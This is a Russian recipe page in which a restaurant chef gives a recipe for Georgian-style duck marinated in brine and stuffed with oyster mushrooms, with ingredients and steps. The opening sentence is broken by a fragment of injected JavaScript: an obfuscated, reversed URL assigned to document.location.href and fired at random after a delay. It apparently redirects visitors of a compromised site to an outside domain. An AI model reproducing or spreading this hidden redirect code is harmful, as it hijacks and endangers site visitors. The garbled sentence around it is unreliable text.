Шеф-повар ресторана грузинской кухни «Казбек» Мамия Джоджуа делится с читателями fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru рецептом утки, маринованной грибами и зеленью. Не сомневайтесь: грузины умеют готовить не только мясо, но и птицу. И знают, как сделать её максимально вкусной и ароматной.
700 calories
Утка по-грузински
Чтобы блюдо действительно получилось грузинским, непременно найдите на рынке сванскую соль. Несмотря на название, это совсем не соль, а сухая смесь специй.
Утка по-грузински
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
90 минут
PT1H30M
PT1H30M
КОЛИЧЕСТВО ПОРЦИЙ:
6 порций
КАЛОРИЙНОСТЬ:
700 ккал
Сложность
Время
90 минут
Кол-во порций
6 порций
Калорийность
700 ккал
Ингредиенты
Утка
2 кг
Сахар (песок)
500 г
Соль
500 г
Тимьян
4 г
Перец (чёрный горошек)
10 г
Лимон
220 г
Лавровый лист
по вкусу
Уксус (белый винный)
1 г
Вода
5 л
Грибы (вёшенки)
500 г
Лук (репчатый)
50 г
Чеснок
10 г
Кинза
15 г
Вино (белое сухое)
70 г
Соль (сванская)
6 г
Масло (растительное)
25 г
Кориандр
2 г
Аджика (красная)
10 г
Процесс приготовления
- Разведите в воде соль и сахар. Выдавите из лимона сок в воду и положите его туда же. Добавьте перец, тимьян, уксус и лавровый лист, хорошо размешайте.
- Смажьте утку и уберите холодильник на 12 часов.
- Вымойте вёшенки, обрежьте корни. Мелко нарежьте лук, а чеснок натрите на мелкой тёрке.
- Обжарьте грибы на растительном масле с добавлением лука и чеснока, до полуготовности.
- Добавьте белое вино и тушите до готовности. Добавьте кинзу, сванскую смесь и кориандр, а затем остудите.
- Маринованную утку нафаршируйте готовыми грибами, смажьте смесью красной аджики и масла и запекайте в духовке 50 минут при температуре 180 градусов. Приятного аппетита!
Статьи по теме
Как правильно запекать утку
10 рецептов шашлыка от ведущих московских шеф-поваров
Как правильно запекать курицу
Рецепт дня: запечённая курица в яблочном маринаде